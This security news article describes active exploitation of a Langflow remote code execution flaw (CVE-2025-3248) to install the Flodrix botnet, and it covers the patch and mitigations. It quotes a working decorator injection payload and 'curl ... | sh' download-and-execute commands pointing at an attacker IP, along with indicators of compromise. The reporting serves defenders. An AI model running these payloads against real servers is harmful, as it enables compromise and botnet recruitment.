A critical remote code execution (RCE) vulnerability in Langflow (CVE-2025-3248) is being actively exploited to deploy the Flodrix botnet, enabling full system compromise and distributed denial-of-service (DDoS) attacks.
The flaw, rated 9.8 on the CVSS scale, affects Langflow versions <1.3.0 and allows unauthenticated attackers to execute arbitrary code via malicious API requests.
Trend Micro reports over 500 exposed instances globally, with threat actors leveraging Shodan/FOFA scans and open-source exploit code to infiltrate AI development environments.
Code Injection via AST Compilation
The vulnerability resides in Langflow’s /api/v1/validate/code endpoint, which processes user-submitted Python code without authentication.
Attackers embed malicious payloads in function decorators or default arguments, exploiting Python’s ast.parse() and compile() functions to execute code during AST validation.
Example exploit payload:
python@exec("import os; os.system('curl http://80.66.75.121/docker | sh')")
def malicious_function():
pass
This code triggers a downloader script that fetches Flodrix binaries.
Langflow’s lack of input sanitization or sandboxing allows such payloads to execute with server privileges, enabling reconnaissance commands like whoami, printenv, and network interface enumeration.
From Initial Access to Botnet Deployment
Exploitation follows a structured pattern:
- Reconnaissance: Threat actors scan for exposed Langflow instances using tools like Shodan.
- Exploitation: A GitHub-hosted PoC (https://github.com/verylazytech/CVE-2025-3248) sends crafted POST requests to execute shell commands.
- Payload Delivery: A bash script (
docker) downloads architecture-specific Flodrix binaries:
bashcurl -s http://80.66.75.121:25565/docker | sh
- Persistence: Flodrix uses XOR-based decryption (key:
qE6MGAbI) to hide C&C IPs, establishes TCP/UDP channels, and terminates competing processes likebusyboxorwatchdog.
The botnet supports six DDoS attack modes, including tcpraw udpplain, while evading detection through self-deletion and artifact removal.
Mitigation Strategies and Patch Analysis
Langflow 1.3.0 resolves CVE-2025-3248 by implementing JWT/API key authentication via the CurrentActiveUser dependency. The patch:
- Validates credentials before processing API requests
- Checks user activity status via
is_activeflag - Blocks unauthenticated access to
/api/v1/validate/code
Recommended actions:
- Upgrade Langflow to ≥1.3.0 immediately
- Restrict public access to Langflow endpoints
- Monitor for IOCs like C&C IPs
80.66.75.121and45.61.137.226
| Risk Factor | Details |
|---|---|
| CVE Identifier | CVE-2025-3248 |
| CVSS Score | 9.8 (Critical) |
| Affected Versions | Langflow <1.3.0 |
| Impact | RCE, DDoS attacks, sensitive data exfiltration |
| Remediation | Patch to v1.3.0; implement network segmentation |
Security teams should deploy intrusion prevention filters (e.g., Trend Micro’s #45744) and hunt for Flodrix’s UDP notification patterns (KILLDETAIL|PID|PPID|...).
With AI infrastructure becoming a prime target, proactive vulnerability management is critical to prevent large-scale compromises.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
%20(1).webp?resize=1600,900&ssl=1&description=The flaw, rated 9.8 on the CVSS scale, affects Langflow versions <1.3.0 and allows unauthenticated attackers to execute arbitrary code via malicious API requests.){kind=link}